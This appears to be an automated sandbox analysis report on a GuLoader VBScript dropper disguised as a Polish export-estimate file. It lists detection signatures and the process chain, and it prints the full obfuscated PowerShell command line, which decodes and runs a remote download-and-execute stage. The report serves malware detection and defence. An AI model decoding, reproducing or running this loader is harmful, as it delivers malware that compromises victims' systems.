Edit tour
Windows
Analysis Report
Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7468 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Szacu nek IMP295 75 za eksp ort z osta tniego kwa rtalu.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 7544 cmdline:
ping Horm5 zl_6637.66 37.6637.65 7e MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 7552 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7608 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Hogher d Chimarik o Coloniza bilities S ternebra # >;$Outdoor sy='Famili enavnets'; <#Durum St artelement ernes Clan gorously S ubstantify Starthull ernes #>;$ Programmer ingssproge ts=$Wane+$ host.UI; f unction To llhouse($L ao){If ($P rogrammeri ngssproget s) {$abase ments++;}$ Vaticinati ng=$Aarema alsstillin gers48+$La o.'Length' -$abasemen ts; for( $ Nonlinear2 28=4;$Nonl inear228 - lt $Vatici nating;$No nlinear228 +=5){$Huma nlike=$Non linear228; $Betting+= $Lao[$Nonl inear228]; $Erantisse nes='Chefa ssistenter s';}$Betti ng;}functi on Profitm agere($Sho etrees){ . ($fors tbotanikke r) ($Shoet rees);}$Sk ubbe=Tollh ouse 'Forl MAnagoSlng zF reiPros l eeklGodv adjel/Land ';$Gangav a=' bef[Mi liNCuarE D dbt ige.Ge maSHis,e P harMuldV i elIEvenC B i,E .ejP a dOLikiIDen snreloTSni gmMenyAInf rN S.iaTem egBo reInk arDodo]Mad s:Nona: Re gsR,tuEran ucS nkuFor RUddaiS n htUnavy K npO.diRDen tOMedltSve ORedncSto pODe ol Tr o Mini=Be, p ';$Skubb e+=Tollhou se 'F,ib5 es.Over0Lu kk Pal.(op pW I fiLo xinPe sd a rkoMicrwVi visUdes ,o nNGallTMoa n Tids1Pre .0 Tem.In, e0ll b;Nos t In eWstr iiSheenCra y6pr s4Hel ;Vand Nit wxlini6 Sk 4 Ude; ev gerWennv Ukri:Tryk1 Taco3Yttr1 Cler.klde0 Up r)Stor ogiG useOr .ac hokTeg uoLuft/ Kl 2Afbi0Opr u1,hul0hyd r0Giav1Sol l0Sign1l.i g Rec FHa. di PolrSle beBe ifR p ooBagaxAf e/Toyl1Eud a3 Ta.1.ra n.Ko.k0E b l ';$Ganga va+='Sole[ ProgNWeevE UforTQuin. GoneSElskE DialcIntru AflnRFerrI VelotInteY De ePPo wr Holko Stat LineO SkrC SurpoC,rol ddmaTMaliY EurypMonkE pri]Inbu ';$Dendroc hronologic ally=Tollh ouse 'Bofo uBr.eS For eGrovR egl - HveAResm G An.E ,lu nLa nt .nd ';$Galvan ism=Tollho use 'Be,rh VejatConst Es.hpT.rss Grun:Fred/ Parm/ p id RekleLiths rubie.nteu AlsirKer i Udsp-Enear DesoOptim Biv.aMelan B goiB,via Tils.,assr BestoTraf/ Aro BWambe StonOvern AbniMeten R cgUdnat OveroGro.n Para.Umisj B.lpOverb Afst ';$Pl ay=Tollhou se ' org>D ec, ';$for stbotanikk er=Tollhou se ' UnliG enoE locx Gud ';$Rel ais20='Cru zieros';$G angava+='F ora: por:U nidTUndilB rugsBril1L a i2Rm.u ' ;$Resurgen ce='\Ghast ily.Kri';P rofitmager e (Tollhou se 'Samm$W lfg lenLP ustoFluoB h nA KliLV olt:EtheBF orea,urvLF a csRepraE v.cMsecteV andRTakeIM adoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNS tatvDokt:S tatA ommPF athpHabeDN odaAFangTS pina Cen+A fve$pha R unreA.riSP alauStr,r Au.g Us eP at NS.cick ogee e e ' );Profitma gere (Toll house ' De i$.ilfg A. aL irnoSit abFrenaSte mLInte:Def lHOxidobes vRZimmm B ooUranNopg aESgne=Hal v$antig Pr eas eeLLin ivUnmeaCon sn MeaIBib ,SFornmG,o g.IntesTr gPstigLVen .I Rustart h(a.ti$skd yP isclRet saRoseyMin i)An e ');